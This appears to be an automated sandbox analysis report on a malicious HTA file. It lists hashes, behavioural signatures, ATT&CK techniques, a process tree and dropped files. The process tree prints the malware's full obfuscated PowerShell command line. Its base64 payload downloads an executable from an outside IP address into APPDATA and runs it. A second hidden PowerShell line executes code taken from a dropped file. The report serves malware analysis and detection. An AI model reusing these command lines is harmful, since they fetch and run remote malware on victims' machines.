8aca79c93ec42b8bd01a7dc5658d82c8282738cf178428ba68abfe64f2bfc24f

General

Target

8aca79c93ec42b8bd01a7dc5658d82c8282738cf178428ba68abfe64f2bfc24f.hta
Size

164KB
MD5

63144d8097791d805f2e04403fea9727
SHA1

a6b828a4351d7d623e9f46ce3dac78f83a145f4e
SHA256

8aca79c93ec42b8bd01a7dc5658d82c8282738cf178428ba68abfe64f2bfc24f
SHA512

6fa04043272a24c1f5bc89fcb0a3fe954e16f51d1257aa25980be5e0517bcdd5e541a25fa01eac50b479b9c945db08497d76f5f4b1d264f0c86b4820ec7dcf4d
SSDEEP

48:7oa+awjz7eWLB227r05bBqeTqfxtRzpyaLGf10px/YsfyfAgs80iJAT:Ea+n7j7wO3HZkUfy4SAT

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	2308	POwERshEll.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
764	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2308	POwERshEll.exe
2356	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2648	taskhostsw.exe

Loads dropped DLL 1 IoCs

pid	Process
2308	POwERshEll.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POwERshEll.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhostsw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x000a000000015d50-30.dat	nsis_installer_1
behavioral1/files/0x000a000000015d50-30.dat	nsis_installer_2

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2308	POwERshEll.exe
2356	powershell.exe
2308	POwERshEll.exe
2308	POwERshEll.exe
764	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2308	POwERshEll.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	764	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1520 wrote to memory of 2308	1520	mshta.exe	30
PID 1520 wrote to memory of 2308	1520	mshta.exe	30
PID 1520 wrote to memory of 2308	1520	mshta.exe	30
PID 1520 wrote to memory of 2308	1520	mshta.exe	30
PID 2308 wrote to memory of 2356	2308	POwERshEll.exe	32
PID 2308 wrote to memory of 2356	2308	POwERshEll.exe	32
PID 2308 wrote to memory of 2356	2308	POwERshEll.exe	32
PID 2308 wrote to memory of 2356	2308	POwERshEll.exe	32
PID 2308 wrote to memory of 1368	2308	POwERshEll.exe	33
PID 2308 wrote to memory of 1368	2308	POwERshEll.exe	33
PID 2308 wrote to memory of 1368	2308	POwERshEll.exe	33
PID 2308 wrote to memory of 1368	2308	POwERshEll.exe	33
PID 1368 wrote to memory of 2772	1368	csc.exe	34
PID 1368 wrote to memory of 2772	1368	csc.exe	34
PID 1368 wrote to memory of 2772	1368	csc.exe	34
PID 1368 wrote to memory of 2772	1368	csc.exe	34
PID 2308 wrote to memory of 2648	2308	POwERshEll.exe	37
PID 2308 wrote to memory of 2648	2308	POwERshEll.exe	37
PID 2308 wrote to memory of 2648	2308	POwERshEll.exe	37
PID 2308 wrote to memory of 2648	2308	POwERshEll.exe	37
PID 2648 wrote to memory of 764	2648	taskhostsw.exe	38
PID 2648 wrote to memory of 764	2648	taskhostsw.exe	38
PID 2648 wrote to memory of 764	2648	taskhostsw.exe	38
PID 2648 wrote to memory of 764	2648	taskhostsw.exe	38

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\8aca79c93ec42b8bd01a7dc5658d82c8282738cf178428ba68abfe64f2bfc24f.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1520
- C:\Windows\SysWOW64\winDOwSPowERSheLL\v1.0\POwERshEll.exe
  "C:\Windows\system32\winDOwSPowERSheLL\v1.0\POwERshEll.exe" "poWersHELl.eXe -ex bYPAsS -Nop -w 1 -C DEvIceCREdeNTIALdEpLoYmEnt ; IEx($(IEx('[sYSteM.teXt.encODinG]'+[CHaR]58+[cHaR]58+'Utf8.GeTsTRING([SYstEM.ConVERT]'+[chaR]58+[char]0X3a+'frOMBAsE64StrIng('+[ChAr]34+'JFUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5JVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTSEVrSHcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHQU5CaGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOVEJrLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkJOYUxOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm9JVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlzSG5SVVFCWGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRVOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjA5LzI1MC90YXNraG9zdHN3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHN3LmV4ZSIsMCwwKTtTdGFydC1zTGVFcCgzKTtzdEFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx0YXNraG9zdHN3LmV4ZSI='+[CHAR]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2308
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAsS -Nop -w 1 -C DEvIceCREdeNTIALdEpLoYmEnt
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2356
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\znrqv_87.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1368
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB932.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB931.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2772
- - C:\Users\Admin\AppData\Roaming\taskhostsw.exe
    "C:\Users\Admin\AppData\Roaming\taskhostsw.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$laet=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\gurlis\billeter\pli\Fjendtligtsindedes171.Ort';$skotjsarbejder=$laet.SubString(68412,3);.$skotjsarbejder($laet) "
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB932.tmp

Filesize
1KB

MD5
41c68ac27935db546d407ed65bbb46d8

SHA1
0b731d051363c468c735e4597206efff48caab0c

SHA256
0fd6e23d37064e3437b0168f1d618740c58f1b9b3a056872dc22c6540d1033dc

SHA512
2e0680fd75f7d06efb73612951f39258d64a4abcbdad91119486f6d4a433f76c88269b1b5377c1547fe70cd6ceef2245c295b548e682a540bbf7550f01f4aac1

Download Submit
C:\Users\Admin\AppData\Local\Temp\znrqv_87.dll

Filesize
3KB

MD5
c85969859cb28d1e231733c50dbaf492

SHA1
e87dfd19acab8a7761c9e65c1d0eec6b17face54

SHA256
ed3ca1cdfd9f9c13005a7ef60fda18405a4cd13b116f7672b30f304d2365a420

SHA512
a324e2838dad9b8ea220ed8fa7be2297474294b5f2584ed9e69ad772b7724adc150654afe91e527542fda2f9c0f1c700d06b0b7a98445f96e0720d7cfc124ff3

Download Submit
C:\Users\Admin\AppData\Local\Temp\znrqv_87.pdb

Filesize
7KB

MD5
92d3446da3e45664b9c64f4cce2e8ddc

SHA1
765bd728b752ce95c6773280aa93279f77e944e7

SHA256
b2c538013b95d3d2935630242e96e4bf5778190fe12666f517074899491a59d2

SHA512
48bbbd817cce2282530d018d12bc463bc54e249e2ab25ff0edfd74de5b8567219dcf9bfcfa155884693c224406588fdc034838a91164890b975d35a611f8269d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
bf32c400f9c1f605e329091772b8bd6d

SHA1
ae5c91afacd940a35c660171f82b7766843fb4a6

SHA256
905b0ae68dbd4b0044921ca457239638831c1c49a3f68aea2f42f38461c6af86

SHA512
0252c68db297e03d27bdaf520f7c4a5d39cfb0e8e44d7fdfc13ebbb38d3a80940ab43351ab982d765db2e7d96696d3adf1070a4e11856320b997eb1fd83f2eac

Download Submit
C:\Users\Admin\AppData\Roaming\taskhostsw.exe

Filesize
628KB

MD5
33aba7d0ecc92933ddc567c1d6d77018

SHA1
87c9a08b4116ad842ad0dad3a876965ab4b0f970

SHA256
bb506f4ed18beafa5229cede6a964c0e14caf04fd4965c7ad00ed21479136a47

SHA512
ed5412933f8f5d0f77eb853df245ad80295284296367916847b16206f55c9beee8e0b98abae349247c1a7642deda831b7534f9e92a3ba22eb015f8267335c1de

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB931.tmp

Filesize
652B

MD5
199d23a756b13bf58b6aaa7d8732804d

SHA1
84782aeec10344f678c1a41d49e10afe72437a53

SHA256
63f98e131e569c5660a8261f1ef163b3c0f69b38ff7f487d6afe65b6d87a9621

SHA512
c3907a31de52b3338aaa667bd42adeb135b59e35e895dab5761101ac05b49ff3521913587a22cf480639f2af7a93922d47af23769c9f1c3172bbe3878e5f84d5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\znrqv_87.0.cs

Filesize
464B

MD5
42dbd852b3f1289844b26a2670d8347b

SHA1
2f8e686220c9f38bdf504333a8df22691027eb96

SHA256
1d3695a641e46e641e2b570e7c9eb6cf74b814045660fe06c8e9f30bf1a167db

SHA512
4a6158079a3d2e67c1b80efbb92ffc2c975724e41a29630093242c4fce8b2a322492c1c8de9ee64e7d8eb76f15fba03c0ed0a86c01a5e38464a8269498683598

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\znrqv_87.cmdline

Filesize
309B

MD5
185dc8bb60035819076efcb7dd864503

SHA1
91c3934ed554e25d7b683141cc13247c17358fab

SHA256
7fc4960a1251b593293b73e902a85479afa4c54d44e5579e54433240d66a6800

SHA512
2be8b9213e23279b2f55de753ff3d50c3a5dc00549d36b85d7b4d1c17bcbcf73ede39b03e16234144d3f659fd00637791e8f39c66be3d173a5e4cfbbebec4b9f

Download Submit

Analysis

Sharing